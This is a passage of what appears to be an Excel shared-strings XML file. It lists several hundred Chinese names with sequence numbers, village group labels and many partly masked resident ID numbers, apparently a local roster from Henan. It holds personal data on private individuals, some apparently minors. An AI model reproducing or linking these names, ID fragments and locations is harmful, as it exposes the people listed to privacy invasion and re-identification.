  <si>
    <t>曹会省</t>
  </si>
  <si>
    <t>412921********0037</t>
  </si>
  <si>
    <t>0131</t>
  </si>
  <si>
    <t>牛进风</t>
  </si>
  <si>
    <t>0132</t>
  </si>
  <si>
    <t>郭春兰</t>
  </si>
  <si>
    <t>0133</t>
  </si>
  <si>
    <t>范海玉</t>
  </si>
  <si>
    <t>0134</t>
  </si>
  <si>
    <t>赵国娥</t>
  </si>
  <si>
    <t>0135</t>
  </si>
  <si>
    <t>李元华</t>
  </si>
  <si>
    <t>0136</t>
  </si>
  <si>
    <t>冯春兰</t>
  </si>
  <si>
    <t>0137</t>
  </si>
  <si>
    <t>钟金荣</t>
  </si>
  <si>
    <t>412921********0043</t>
  </si>
  <si>
    <t>0138</t>
  </si>
  <si>
    <t>辛小香</t>
  </si>
  <si>
    <t>412921********0064</t>
  </si>
  <si>
    <t>0139</t>
  </si>
  <si>
    <t>郑明东</t>
  </si>
  <si>
    <t>0140</t>
  </si>
  <si>
    <t>王兴发</t>
  </si>
  <si>
    <t>412921********0010</t>
  </si>
  <si>
    <t>0141</t>
  </si>
  <si>
    <t>郭红杰</t>
  </si>
  <si>
    <t>0142</t>
  </si>
  <si>
    <t>曹会军</t>
  </si>
  <si>
    <t>0143</t>
  </si>
  <si>
    <t>田炳绪</t>
  </si>
  <si>
    <t>412921********021X</t>
  </si>
  <si>
    <t>0144</t>
  </si>
  <si>
    <t>谷秀东</t>
  </si>
  <si>
    <t>0145</t>
  </si>
  <si>
    <t>0146</t>
  </si>
  <si>
    <t>张国敏</t>
  </si>
  <si>
    <t>0147</t>
  </si>
  <si>
    <t>张运甲</t>
  </si>
  <si>
    <t>411326********001X</t>
  </si>
  <si>
    <t>0148</t>
  </si>
  <si>
    <t>郭永山</t>
  </si>
  <si>
    <t>0149</t>
  </si>
  <si>
    <t>陈新云</t>
  </si>
  <si>
    <t>0150</t>
  </si>
  <si>
    <t>闫荣芝</t>
  </si>
  <si>
    <t>0151</t>
  </si>
  <si>
    <t>石万付</t>
  </si>
  <si>
    <t>412921********0072</t>
  </si>
  <si>
    <t>0152</t>
  </si>
  <si>
    <t>金元枝</t>
  </si>
  <si>
    <t>0153</t>
  </si>
  <si>
    <t>李书强</t>
  </si>
  <si>
    <t>412921********0014</t>
  </si>
  <si>
    <t>0154</t>
  </si>
  <si>
    <t>王世兰</t>
  </si>
  <si>
    <t>0155</t>
  </si>
  <si>
    <t>随丁环</t>
  </si>
  <si>
    <t>0156</t>
  </si>
  <si>
    <t>李兴阁</t>
  </si>
  <si>
    <t>0157</t>
  </si>
  <si>
    <t>刘国柱</t>
  </si>
  <si>
    <t>0158</t>
  </si>
  <si>
    <t>李纪要</t>
  </si>
  <si>
    <t>0159</t>
  </si>
  <si>
    <t>杨柳</t>
  </si>
  <si>
    <t>411326********0013</t>
  </si>
  <si>
    <t>0160</t>
  </si>
  <si>
    <t>赵华中</t>
  </si>
  <si>
    <t>412921********0015</t>
  </si>
  <si>
    <t>0161</t>
  </si>
  <si>
    <t>孙运英</t>
  </si>
  <si>
    <t>0162</t>
  </si>
  <si>
    <t>张连菊</t>
  </si>
  <si>
    <t>412921********0203</t>
  </si>
  <si>
    <t>0163</t>
  </si>
  <si>
    <t>赵玉玲</t>
  </si>
  <si>
    <t>412921********0267</t>
  </si>
  <si>
    <t>0164</t>
  </si>
  <si>
    <t>东北二组</t>
  </si>
  <si>
    <t>王太平</t>
  </si>
  <si>
    <t>412921********3328</t>
  </si>
  <si>
    <t>0165</t>
  </si>
  <si>
    <t>高生</t>
  </si>
  <si>
    <t>0166</t>
  </si>
  <si>
    <t>郭延松</t>
  </si>
  <si>
    <t>0167</t>
  </si>
  <si>
    <t>郭保剑</t>
  </si>
  <si>
    <t>411321********0032</t>
  </si>
  <si>
    <t>0168</t>
  </si>
  <si>
    <t>张自付</t>
  </si>
  <si>
    <t>0169</t>
  </si>
  <si>
    <t>代欣菊</t>
  </si>
  <si>
    <t>0170</t>
  </si>
  <si>
    <t>王桂兰</t>
  </si>
  <si>
    <t>0171</t>
  </si>
  <si>
    <t>李天平</t>
  </si>
  <si>
    <t>412921********028X</t>
  </si>
  <si>
    <t>0172</t>
  </si>
  <si>
    <t>刘景元</t>
  </si>
  <si>
    <t>0173</t>
  </si>
  <si>
    <t>张付军</t>
  </si>
  <si>
    <t>0174</t>
  </si>
  <si>
    <t>李付芝</t>
  </si>
  <si>
    <t>412921********0088</t>
  </si>
  <si>
    <t>0175</t>
  </si>
  <si>
    <t>丁世贵</t>
  </si>
  <si>
    <t>0176</t>
  </si>
  <si>
    <t>雷喜梅</t>
  </si>
  <si>
    <t>0177</t>
  </si>
  <si>
    <t>孙运奇</t>
  </si>
  <si>
    <t>412921********0035</t>
  </si>
  <si>
    <t>0178</t>
  </si>
  <si>
    <t>秦性华</t>
  </si>
  <si>
    <t>412921********0100</t>
  </si>
  <si>
    <t>0179</t>
  </si>
  <si>
    <t>孟庆合</t>
  </si>
  <si>
    <t>0180</t>
  </si>
  <si>
    <t>魏振华</t>
  </si>
  <si>
    <t>0181</t>
  </si>
  <si>
    <t>常德生</t>
  </si>
  <si>
    <t>412921********0056</t>
  </si>
  <si>
    <t>0182</t>
  </si>
  <si>
    <t>王相甫</t>
  </si>
  <si>
    <t>0183</t>
  </si>
  <si>
    <t>王长荣</t>
  </si>
  <si>
    <t>0184</t>
  </si>
  <si>
    <t>许来福</t>
  </si>
  <si>
    <t>0185</t>
  </si>
  <si>
    <t>贾青芳</t>
  </si>
  <si>
    <t>0186</t>
  </si>
  <si>
    <t>张吉臣</t>
  </si>
  <si>
    <t>0187</t>
  </si>
  <si>
    <t>李敏英</t>
  </si>
  <si>
    <t>0188</t>
  </si>
  <si>
    <t>张怀君</t>
  </si>
  <si>
    <t>0189</t>
  </si>
  <si>
    <t>沈东焕</t>
  </si>
  <si>
    <t>411324********0043</t>
  </si>
  <si>
    <t>0190</t>
  </si>
  <si>
    <t>陈国保</t>
  </si>
  <si>
    <t>412921********0038</t>
  </si>
  <si>
    <t>0191</t>
  </si>
  <si>
    <t>王荣兰</t>
  </si>
  <si>
    <t>0192</t>
  </si>
  <si>
    <t>周全永</t>
  </si>
  <si>
    <t>0193</t>
  </si>
  <si>
    <t>杨玉林</t>
  </si>
  <si>
    <t>412921********0091</t>
  </si>
  <si>
    <t>0194</t>
  </si>
  <si>
    <t>楚德合</t>
  </si>
  <si>
    <t>0195</t>
  </si>
  <si>
    <t>张国菊</t>
  </si>
  <si>
    <t>0196</t>
  </si>
  <si>
    <t>贺元大</t>
  </si>
  <si>
    <t>412921********0334</t>
  </si>
  <si>
    <t>0197</t>
  </si>
  <si>
    <t>张明杰</t>
  </si>
  <si>
    <t>0198</t>
  </si>
  <si>
    <t>沈朝正</t>
  </si>
  <si>
    <t>0199</t>
  </si>
  <si>
    <t>李金芳</t>
  </si>
  <si>
    <t>0200</t>
  </si>
  <si>
    <t>许平敏</t>
  </si>
  <si>
    <t>0201</t>
  </si>
  <si>
    <t>魏仁付</t>
  </si>
  <si>
    <t>0202</t>
  </si>
  <si>
    <t>常文秀</t>
  </si>
  <si>
    <t>0203</t>
  </si>
  <si>
    <t>张书仓</t>
  </si>
  <si>
    <t>0204</t>
  </si>
  <si>
    <t>刘振梅</t>
  </si>
  <si>
    <t>0205</t>
  </si>
  <si>
    <t>党国勤</t>
  </si>
  <si>
    <t>0206</t>
  </si>
  <si>
    <t>姬天秀</t>
  </si>
  <si>
    <t>412921********008X</t>
  </si>
  <si>
    <t>0207</t>
  </si>
  <si>
    <t>赵花香</t>
  </si>
  <si>
    <t>0208</t>
  </si>
  <si>
    <t>薛喜海</t>
  </si>
  <si>
    <t>0209</t>
  </si>
  <si>
    <t>吴桂川</t>
  </si>
  <si>
    <t>412921********0070</t>
  </si>
  <si>
    <t>0210</t>
  </si>
  <si>
    <t>李桂英</t>
  </si>
  <si>
    <t>412921********0142</t>
  </si>
  <si>
    <t>0211</t>
  </si>
  <si>
    <t>郑召龙</t>
  </si>
  <si>
    <t>0212</t>
  </si>
  <si>
    <t>柯玉芝</t>
  </si>
  <si>
    <t>0213</t>
  </si>
  <si>
    <t>石君阳</t>
  </si>
  <si>
    <t>0214</t>
  </si>
  <si>
    <t>张喜来</t>
  </si>
  <si>
    <t>0215</t>
  </si>
  <si>
    <t>李同君</t>
  </si>
  <si>
    <t>0216</t>
  </si>
  <si>
    <t>杨广霞</t>
  </si>
  <si>
    <t>412921********0068</t>
  </si>
  <si>
    <t>0217</t>
  </si>
  <si>
    <t>朱全荣</t>
  </si>
  <si>
    <t>0218</t>
  </si>
  <si>
    <t>任洪霞</t>
  </si>
  <si>
    <t>0219</t>
  </si>
  <si>
    <t>赵苍武</t>
  </si>
  <si>
    <t>0220</t>
  </si>
  <si>
    <t>杨国秀</t>
  </si>
  <si>
    <t>412921********0221</t>
  </si>
  <si>
    <t>0221</t>
  </si>
  <si>
    <t>王学云</t>
  </si>
  <si>
    <t>412921********0045</t>
  </si>
  <si>
    <t>0222</t>
  </si>
  <si>
    <t>任寿超</t>
  </si>
  <si>
    <t>0223</t>
  </si>
  <si>
    <t>郑云</t>
  </si>
  <si>
    <t>0224</t>
  </si>
  <si>
    <t>石英丽</t>
  </si>
  <si>
    <t>412921********0067</t>
  </si>
  <si>
    <t>0225</t>
  </si>
  <si>
    <t>谷小伟</t>
  </si>
  <si>
    <t>0226</t>
  </si>
  <si>
    <t>聂兴州</t>
  </si>
  <si>
    <t>0227</t>
  </si>
  <si>
    <t>吴永春</t>
  </si>
  <si>
    <t>0228</t>
  </si>
  <si>
    <t>司朝建</t>
  </si>
  <si>
    <t>0229</t>
  </si>
  <si>
    <t>柴嫦娥</t>
  </si>
  <si>
    <t>412921********0080</t>
  </si>
  <si>
    <t>0230</t>
  </si>
  <si>
    <t>范付杰</t>
  </si>
  <si>
    <t>0231</t>
  </si>
  <si>
    <t>张国华</t>
  </si>
  <si>
    <t>0232</t>
  </si>
  <si>
    <t>滑秀勤</t>
  </si>
  <si>
    <t>0233</t>
  </si>
  <si>
    <t>秦性军</t>
  </si>
  <si>
    <t>0234</t>
  </si>
  <si>
    <t>黄小香</t>
  </si>
  <si>
    <t>0235</t>
  </si>
  <si>
    <t>隋洪魁</t>
  </si>
  <si>
    <t>0236</t>
  </si>
  <si>
    <t>王德芳</t>
  </si>
  <si>
    <t>412921********0161</t>
  </si>
  <si>
    <t>0237</t>
  </si>
  <si>
    <t>张书珍</t>
  </si>
  <si>
    <t>0238</t>
  </si>
  <si>
    <t>孙中瑞</t>
  </si>
  <si>
    <t>411326********002X</t>
  </si>
  <si>
    <t>0239</t>
  </si>
  <si>
    <t>靳浩然</t>
  </si>
  <si>
    <t>411321********0011</t>
  </si>
  <si>
    <t>0240</t>
  </si>
  <si>
    <t>周保梅</t>
  </si>
  <si>
    <t>0241</t>
  </si>
  <si>
    <t>张红燕</t>
  </si>
  <si>
    <t>0242</t>
  </si>
  <si>
    <t>周军</t>
  </si>
  <si>
    <t>412921********009X</t>
  </si>
  <si>
    <t>0243</t>
  </si>
  <si>
    <t>周西峰</t>
  </si>
  <si>
    <t>0244</t>
  </si>
  <si>
    <t>孙建成</t>
  </si>
  <si>
    <t>0245</t>
  </si>
  <si>
    <t>王德玲</t>
  </si>
  <si>
    <t>412921********0324</t>
  </si>
  <si>
    <t>0246</t>
  </si>
  <si>
    <t>高芝</t>
  </si>
  <si>
    <t>0247</t>
  </si>
  <si>
    <t>刘杰</t>
  </si>
  <si>
    <t>0248</t>
  </si>
  <si>
    <t>刘钰晗</t>
  </si>
  <si>
    <t>411321********5583</t>
  </si>
  <si>
    <t>0249</t>
  </si>
  <si>
    <t>刘烁宇</t>
  </si>
  <si>
    <t>411321********5121</t>
  </si>
  <si>
    <t>0250</t>
  </si>
  <si>
    <t>张金峰</t>
  </si>
  <si>
    <t>0251</t>
  </si>
  <si>
    <t>李敏</t>
  </si>
  <si>
    <t>0252</t>
  </si>
  <si>
    <t>宋学伟</t>
  </si>
  <si>
    <t>0253</t>
  </si>
  <si>
    <t>黄金华</t>
  </si>
  <si>
    <t>412921********0342</t>
  </si>
  <si>
    <t>0254</t>
  </si>
  <si>
    <t>刘佳佳</t>
  </si>
  <si>
    <t>411321********0042</t>
  </si>
  <si>
    <t>0255</t>
  </si>
  <si>
    <t>隋元华</t>
  </si>
  <si>
    <t>0256</t>
  </si>
  <si>
    <t>董金仓</t>
  </si>
  <si>
    <t>0257</t>
  </si>
  <si>
    <t>张丰芝</t>
  </si>
  <si>
    <t>0258</t>
  </si>
  <si>
    <t>王付海</t>
  </si>
  <si>
    <t>0259</t>
  </si>
  <si>
    <t>李春贞</t>
  </si>
  <si>
    <t>412921********0214</t>
  </si>
  <si>
    <t>0260</t>
  </si>
  <si>
    <t>王文彩</t>
  </si>
  <si>
    <t>0261</t>
  </si>
  <si>
    <t>朱保印</t>
  </si>
  <si>
    <t>0262</t>
  </si>
  <si>
    <t>张霞</t>
  </si>
  <si>
    <t>0263</t>
  </si>
  <si>
    <t>东北三组</t>
  </si>
  <si>
    <t>刘德荣</t>
  </si>
  <si>
    <t>412921********0404</t>
  </si>
  <si>
    <t>0264</t>
  </si>
  <si>
    <t>刘国正</t>
  </si>
  <si>
    <t>412921********0051</t>
  </si>
  <si>
    <t>0265</t>
  </si>
  <si>
    <t>张保琴</t>
  </si>
  <si>
    <t>412921********0048</t>
  </si>
  <si>
    <t>0266</t>
  </si>
  <si>
    <t>0267</t>
  </si>
  <si>
    <t>高志科</t>
  </si>
  <si>
    <t>0268</t>
  </si>
  <si>
    <t>魏怀珍</t>
  </si>
  <si>
    <t>0269</t>
  </si>
  <si>
    <t>李金英</t>
  </si>
  <si>
    <t>0270</t>
  </si>
  <si>
    <t>任国风</t>
  </si>
  <si>
    <t>411326********006X</t>
  </si>
  <si>
    <t>0271</t>
  </si>
  <si>
    <t>郭永义</t>
  </si>
  <si>
    <t>0272</t>
  </si>
  <si>
    <t>靳应荣</t>
  </si>
  <si>
    <t>0273</t>
  </si>
  <si>
    <t>方俊德</t>
  </si>
  <si>
    <t>0274</t>
  </si>
  <si>
    <t>闫书斌</t>
  </si>
  <si>
    <t>0275</t>
  </si>
  <si>
    <t>陈生永</t>
  </si>
  <si>
    <t>0276</t>
  </si>
  <si>
    <t>陈生朋</t>
  </si>
  <si>
    <t>0277</t>
  </si>
  <si>
    <t>李长敏</t>
  </si>
  <si>
    <t>0278</t>
  </si>
  <si>
    <t>刘长建</t>
  </si>
  <si>
    <t>0279</t>
  </si>
  <si>
    <t>魏延雪</t>
  </si>
  <si>
    <t>0280</t>
  </si>
  <si>
    <t>林广科</t>
  </si>
  <si>
    <t>0281</t>
  </si>
  <si>
    <t>石三兰</t>
  </si>
  <si>
    <t>412921********0060</t>
  </si>
  <si>
    <t>0282</t>
  </si>
  <si>
    <t>曹会保</t>
  </si>
  <si>
    <t>0283</t>
  </si>
  <si>
    <t>李青旺</t>
  </si>
  <si>
    <t>0284</t>
  </si>
  <si>
    <t>闫学成</t>
  </si>
  <si>
    <t>0285</t>
  </si>
  <si>
    <t>冯花英</t>
  </si>
  <si>
    <t>0286</t>
  </si>
  <si>
    <t>张春照</t>
  </si>
  <si>
    <t>0287</t>
  </si>
  <si>
    <t>周凤敏</t>
  </si>
  <si>
    <t>0288</t>
  </si>
  <si>
    <t>吴秀英</t>
  </si>
  <si>
    <t>0289</t>
  </si>
  <si>
    <t>王友敏</t>
  </si>
  <si>
    <t>412921********0033</t>
  </si>
  <si>
    <t>0290</t>
  </si>
  <si>
    <t>常德勤</t>
  </si>
  <si>
    <t>0291</t>
  </si>
  <si>
    <t>李萍</t>
  </si>
  <si>
    <t>0292</t>
  </si>
  <si>
    <t>马青华</t>
  </si>
  <si>
    <t>0293</t>
  </si>
  <si>
    <t>张仁凤</t>
  </si>
  <si>
    <t>0294</t>
  </si>
  <si>
    <t>李春常</t>
  </si>
  <si>
    <t>0295</t>
  </si>
  <si>
    <t>程元华</t>
  </si>
  <si>
    <t>0296</t>
  </si>
  <si>
    <t>王东杰</t>
  </si>
  <si>
    <t>0297</t>
  </si>
  <si>
    <t>王书珍</t>
  </si>
  <si>
    <t>0298</t>
  </si>
  <si>
    <t>秦峰</t>
  </si>
  <si>
    <t>0299</t>
  </si>
  <si>
    <t>余相贵</t>
  </si>
  <si>
    <t>0300</t>
  </si>
  <si>
    <t>胡秀芳</t>
  </si>
  <si>
    <t>0301</t>
  </si>
  <si>
    <t>412921********0299</t>
  </si>
  <si>
    <t>0302</t>
  </si>
  <si>
    <t>杨兴会</t>
  </si>
  <si>
    <t>412924********0728</t>
  </si>
  <si>
    <t>0303</t>
  </si>
  <si>
    <t>代欣然</t>
  </si>
  <si>
    <t>0304</t>
  </si>
  <si>
    <t>何国敏</t>
  </si>
  <si>
    <t>0305</t>
  </si>
  <si>
    <t>田光辉</t>
  </si>
  <si>
    <t>0306</t>
  </si>
  <si>
    <t>田青</t>
  </si>
  <si>
    <t>411326********0041</t>
  </si>
  <si>
    <t>0307</t>
  </si>
  <si>
    <t>李振坤</t>
  </si>
  <si>
    <t>412921********0059</t>
  </si>
  <si>
    <t>0308</t>
  </si>
  <si>
    <t>李文钰</t>
  </si>
  <si>
    <t>411326********0022</t>
  </si>
  <si>
    <t>0309</t>
  </si>
  <si>
    <t>贺凤</t>
  </si>
  <si>
    <t>412921********444X</t>
  </si>
  <si>
    <t>0310</t>
  </si>
  <si>
    <t>吴桂珍</t>
  </si>
  <si>
    <t>0311</t>
  </si>
  <si>
    <t>汤友强</t>
  </si>
  <si>
    <t>411326********0017</t>
  </si>
  <si>
    <t>0312</t>
  </si>
  <si>
    <t>许文春</t>
  </si>
  <si>
    <t>412921********0310</t>
  </si>
  <si>
    <t>0313</t>
  </si>
  <si>
    <t>刘会敏</t>
  </si>
  <si>
    <t>0314</t>
  </si>
  <si>
    <t>吉怀印</t>
  </si>
  <si>
    <t>0315</t>
  </si>
  <si>
    <t>李建洲</t>
  </si>
  <si>
    <t>0316</t>
  </si>
  <si>
    <t>张付荣</t>
  </si>
  <si>
    <t>0317</t>
  </si>
  <si>
    <t>石三成</t>
  </si>
  <si>
    <t>412921********0399</t>
  </si>
  <si>
    <t>0318</t>
  </si>
  <si>
    <t>王杰</t>
  </si>
  <si>
    <t>0319</t>
  </si>
  <si>
    <t>魏洪林</t>
  </si>
  <si>
    <t>412921********511X</t>
  </si>
  <si>
    <t>0320</t>
  </si>
  <si>
    <t>田发根</t>
  </si>
  <si>
    <t>0321</t>
  </si>
  <si>
    <t>田俊英</t>
  </si>
  <si>
    <t>0322</t>
  </si>
  <si>
    <t>曲佳存</t>
  </si>
  <si>
    <t>411326********0012</t>
  </si>
  <si>
    <t>0323</t>
  </si>
  <si>
    <t>曲梦然</t>
  </si>
  <si>
    <t>411328********2944</t>
  </si>
  <si>
    <t>0324</t>
  </si>
  <si>
    <t>赵俊青</t>
  </si>
  <si>
    <t>0325</t>
  </si>
  <si>
    <t>王万克</t>
  </si>
  <si>
    <t>0326</t>
  </si>
  <si>
    <t>闫荣芬</t>
  </si>
  <si>
    <t>0327</t>
  </si>
  <si>
    <t>郝春丽</t>
  </si>
  <si>
    <t>0328</t>
  </si>
  <si>
    <t>吴铁梁</t>
  </si>
  <si>
    <t>0329</t>
  </si>
  <si>
    <t>樊德焕</t>
  </si>
  <si>
    <t>0330</t>
  </si>
  <si>
    <t>赵创</t>
  </si>
  <si>
    <t>0331</t>
  </si>
  <si>
    <t>赵艺涵</t>
  </si>
  <si>
    <t>411321********0020</t>
  </si>
  <si>
    <t>0332</t>
  </si>
  <si>
    <t>谢庆凡</t>
  </si>
  <si>
    <t>0333</t>
  </si>
  <si>
    <t>杨明清</t>
  </si>
  <si>
    <t>0334</t>
  </si>
  <si>
    <t>曾祥平</t>
  </si>
  <si>
    <t>0335</t>
  </si>
  <si>
    <t>谷秀珍</t>
  </si>
  <si>
    <t>412921********0200</t>
  </si>
  <si>
    <t>0336</t>
  </si>
  <si>
    <t>林长</t>
  </si>
  <si>
    <t>0337</t>
  </si>
  <si>
    <t>赵全会</t>
  </si>
  <si>
    <t>0338</t>
  </si>
  <si>
    <t>何庆盈</t>
  </si>
  <si>
    <t>0339</t>
  </si>
  <si>
    <t>靳德军</t>
  </si>
  <si>
    <t>0340</t>
  </si>
  <si>
    <t>亿长云</t>
  </si>
  <si>
    <t>0341</t>
  </si>
  <si>
    <t>曹会霞</t>
  </si>
  <si>
    <t>0342</t>
  </si>
  <si>
    <t>李万杰</t>
  </si>
  <si>
    <t>412921********513X</t>
  </si>
  <si>
    <t>0343</t>
  </si>
  <si>
    <t>沈金洪</t>
  </si>
  <si>
    <t>0344</t>
  </si>
  <si>
    <t>石光召</t>
  </si>
  <si>
    <t>0345</t>
  </si>
  <si>
    <t>刘玉凤</t>
  </si>
  <si>
    <t>0346</t>
  </si>
  <si>
    <t>吴秋颖</t>
  </si>
  <si>
    <t>0347</t>
  </si>
  <si>
    <t>李彬</t>
  </si>
  <si>
    <t>0348</t>
  </si>
  <si>
    <t>李梓嘉</t>
  </si>
  <si>
    <t>411321********0285</t>
  </si>
  <si>
    <t>0349</t>
  </si>
  <si>
    <t>毛钦连</t>
  </si>
  <si>
    <t>0350</t>
  </si>
  <si>
    <t>赵平远</t>
  </si>
  <si>
    <t>0351</t>
  </si>
  <si>
    <t>陈付梅</t>
  </si>
  <si>
    <t>0352</t>
  </si>
  <si>
    <t>0353</t>
  </si>
  <si>
    <t>0354</t>
  </si>
  <si>
    <t>赵运花</t>
  </si>
  <si>
    <t>0355</t>
  </si>
  <si>
    <t>刘喜瑞</t>
  </si>
  <si>
    <t>412921********5125</t>
  </si>
  <si>
    <t>0356</t>
  </si>
  <si>
    <t>杨树春</t>
  </si>
  <si>
    <t>412921********0062</t>
  </si>
  <si>
    <t>0357</t>
  </si>
  <si>
    <t>赵国锦</t>
  </si>
  <si>
    <t>0358</t>
  </si>
  <si>
    <t>史铁成</t>
  </si>
  <si>
    <t>0359</t>
  </si>
  <si>
    <t>赵长秀</t>
  </si>
  <si>
    <t>0360</t>
  </si>
  <si>
    <t>郑霞</t>
  </si>
  <si>
    <t>0361</t>
  </si>
  <si>
    <t>曹国勤</t>
  </si>
  <si>
    <t>412921********0105</t>
  </si>
  <si>
    <t>0362</t>
  </si>
  <si>
    <t>陈清合</t>
  </si>
  <si>
    <t>0363</t>
  </si>
  <si>
    <t>王德梅</t>
  </si>
  <si>
    <t>0364</t>
  </si>
  <si>
    <t>陈欣怡</t>
  </si>
  <si>
    <t>411321********0461</t>
  </si>
  <si>
    <t>0365</t>
  </si>
  <si>
    <t>谷秀杰</t>
  </si>
  <si>
    <t>0366</t>
  </si>
  <si>
    <t>靳小红</t>
  </si>
  <si>
    <t>0367</t>
  </si>
  <si>
    <t>靳袁镜</t>
  </si>
  <si>
    <t>411321********0024</t>
  </si>
  <si>
    <t>0368</t>
  </si>
  <si>
    <t>李清云</t>
  </si>
  <si>
    <t>0369</t>
  </si>
  <si>
    <t>李霞</t>
  </si>
  <si>
    <t>0370</t>
  </si>
  <si>
    <t>刘廷国</t>
  </si>
  <si>
    <t>412921********5119</t>
  </si>
  <si>
    <t>0371</t>
  </si>
  <si>
    <t>方荣杰</t>
  </si>
  <si>
    <t>412921********5140</t>
  </si>
  <si>
    <t>0372</t>
  </si>
  <si>
    <t>田向宇</t>
  </si>
  <si>
    <t>0373</t>
  </si>
  <si>
    <t>王德华</t>
  </si>
  <si>
    <t>0374</t>
  </si>
  <si>
    <t>金振惠</t>
  </si>
  <si>
    <t>412921********0168</t>
  </si>
  <si>
    <t>0375</t>
  </si>
  <si>
    <t>王来科</t>
  </si>
  <si>
    <t>0376</t>
  </si>
  <si>
    <t>王秀英</t>
  </si>
  <si>
    <t>0377</t>
  </si>
  <si>
    <t>王奇发</t>
  </si>
  <si>
    <t>0378</t>
  </si>
  <si>
    <t>吴桂朝</t>
  </si>
  <si>
    <t>0379</t>
  </si>
  <si>
    <t>吴庆玉</t>
  </si>
  <si>
    <t>0380</t>
  </si>
  <si>
    <t>郭永香</t>
  </si>
  <si>
    <t>0381</t>
  </si>
  <si>
    <t>徐国信</t>
  </si>
  <si>
    <t>0382</t>
  </si>
  <si>
    <t>许召付</t>
  </si>
  <si>
    <t>412921********0193</t>
  </si>
  <si>
    <t>0383</t>
  </si>
  <si>
    <t>郭心芝</t>
  </si>
  <si>
    <t>0384</t>
  </si>
  <si>
    <t>杨素芝</t>
  </si>
  <si>
    <t>0385</t>
  </si>
  <si>
    <t>沈润坤</t>
  </si>
  <si>
    <t>411326********0043</t>
  </si>
  <si>
    <t>0386</t>
  </si>
  <si>
    <t>张庆芝</t>
  </si>
  <si>
    <t>0387</t>
  </si>
  <si>
    <t>张召峰</t>
  </si>
  <si>
    <t>0388</t>
  </si>
  <si>
    <t>赵运荣</t>
  </si>
  <si>
    <t>412921********0128</t>
  </si>
  <si>
    <t>0389</t>
  </si>
  <si>
    <t>胡生玉</t>
  </si>
  <si>
    <t>0390</t>
  </si>
  <si>
    <t>杨玉华</t>
  </si>
  <si>
    <t>412921********1563</t>
  </si>
  <si>
    <t>0391</t>
  </si>
  <si>
    <t>张晓</t>
  </si>
  <si>
    <t>411326********0023</t>
  </si>
  <si>
    <t>0392</t>
  </si>
  <si>
    <t>薛庚申</t>
  </si>
  <si>
    <t>0393</t>
  </si>
  <si>
    <t>谢建生</t>
  </si>
  <si>
    <t>411326********0079</t>
  </si>
  <si>
    <t>0394</t>
  </si>
  <si>
    <t>谢政彬</t>
  </si>
  <si>
    <t>411321********0053</t>
  </si>
  <si>
    <t>0395</t>
  </si>
  <si>
    <t>刘长昊</t>
  </si>
  <si>
    <t>411321********043X</t>
  </si>
  <si>
    <t>0396</t>
  </si>
  <si>
    <t>刘冬忠</t>
  </si>
  <si>
    <t>0397</t>
  </si>
  <si>
    <t>李青杰</t>
  </si>
  <si>
    <t>0398</t>
  </si>
  <si>
    <t>聂飞</t>
  </si>
  <si>
    <t>0399</t>
  </si>
  <si>
    <t>安付贵</t>
  </si>
  <si>
    <t>0400</t>
  </si>
  <si>
    <t>李玉梅</t>
  </si>
  <si>
    <t>412921********7746</t>
  </si>
  <si>
    <t>0401</t>
  </si>
  <si>
    <t>方运献</t>
  </si>
  <si>
    <t>0402</t>
  </si>
  <si>
    <t>沈鹏</t>
  </si>
  <si>
    <t>0403</t>
  </si>
  <si>
    <t>赵金华</t>
  </si>
  <si>
    <t>0404</t>
  </si>
  <si>
    <t>孙平</t>
  </si>
  <si>
    <t>0405</t>
  </si>
  <si>
    <t>王运春</t>
  </si>
  <si>
    <t>0406</t>
  </si>
  <si>
    <t>席清敏</t>
  </si>
  <si>
    <t>412921********0089</t>
  </si>
  <si>
    <t>0407</t>
  </si>
  <si>
    <t>杨立刚</t>
  </si>
  <si>
    <t>0408</t>
  </si>
  <si>
    <t>贾清荣</t>
  </si>
  <si>
    <t>0409</t>
  </si>
  <si>
    <t>刘花荣</t>
  </si>
  <si>
    <t>0410</t>
  </si>
  <si>
    <t>曹炎</t>
  </si>
  <si>
    <t>0411</t>
  </si>
  <si>
    <t>李元振</t>
  </si>
  <si>
    <t>412921********0356</t>
  </si>
  <si>
    <t>0412</t>
  </si>
  <si>
    <t>张华</t>
  </si>
  <si>
    <t>412921********0149</t>
  </si>
  <si>
    <t>0413</t>
  </si>
  <si>
    <t>范振荣</t>
  </si>
  <si>
    <t>0414</t>
  </si>
  <si>
    <t>尚萍</t>
  </si>
  <si>
    <t>0415</t>
  </si>
  <si>
    <t>陈天伟</t>
  </si>
  <si>
    <t>412921********0235</t>
  </si>
  <si>
    <t>0416</t>
  </si>
  <si>
    <t>翟远敏</t>
  </si>
  <si>
    <t>0417</t>
  </si>
  <si>
    <t>石洪敏</t>
  </si>
  <si>
    <t>0418</t>
  </si>
  <si>
    <t>王爱</t>
  </si>
  <si>
    <t>0419</t>
  </si>
  <si>
    <t>朱红明</t>
  </si>
  <si>
    <t>0420</t>
  </si>
  <si>
    <t>王森</t>
  </si>
  <si>
    <t>411326********0056</t>
  </si>
  <si>
    <t>4113210101</t>
  </si>
  <si>
    <t>0421</t>
  </si>
  <si>
    <t>刘荣兰</t>
  </si>
  <si>
    <t>0422</t>
  </si>
  <si>
    <t>仝太军</t>
  </si>
  <si>
    <t>0423</t>
  </si>
  <si>
    <t>城关</t>
  </si>
  <si>
    <t>蔡黎</t>
  </si>
  <si>
    <t>0424</t>
  </si>
  <si>
    <t>城关东北六组</t>
  </si>
  <si>
    <t>梁燕</t>
  </si>
  <si>
    <t>411326********0026</t>
  </si>
  <si>
    <t>0425</t>
  </si>
  <si>
    <t>任肖征</t>
  </si>
  <si>
    <t>0426</t>
  </si>
  <si>
    <t>城关镇中华村</t>
  </si>
  <si>
    <t>刘双龙</t>
  </si>
  <si>
    <t>0427</t>
  </si>
  <si>
    <t>刘鸿涛</t>
  </si>
  <si>
    <t>411324********301X</t>
  </si>
  <si>
    <t>0428</t>
  </si>
  <si>
    <t>刘靳琪</t>
  </si>
  <si>
    <t>411321********5180</t>
  </si>
  <si>
    <t>0429</t>
  </si>
  <si>
    <t>张殿洲</t>
  </si>
  <si>
    <t>412921********0074</t>
  </si>
  <si>
    <t>0430</t>
  </si>
  <si>
    <t>李文忠</t>
  </si>
  <si>
    <t>0431</t>
  </si>
  <si>
    <t>李增伟</t>
  </si>
  <si>
    <t>411321********6163</t>
  </si>
  <si>
    <t>0432</t>
  </si>
  <si>
    <t>郭相全</t>
  </si>
  <si>
    <t>0433</t>
  </si>
  <si>
    <t>郭淯硕</t>
  </si>
  <si>
    <t>411321********3002</t>
  </si>
  <si>
    <t>0434</t>
  </si>
  <si>
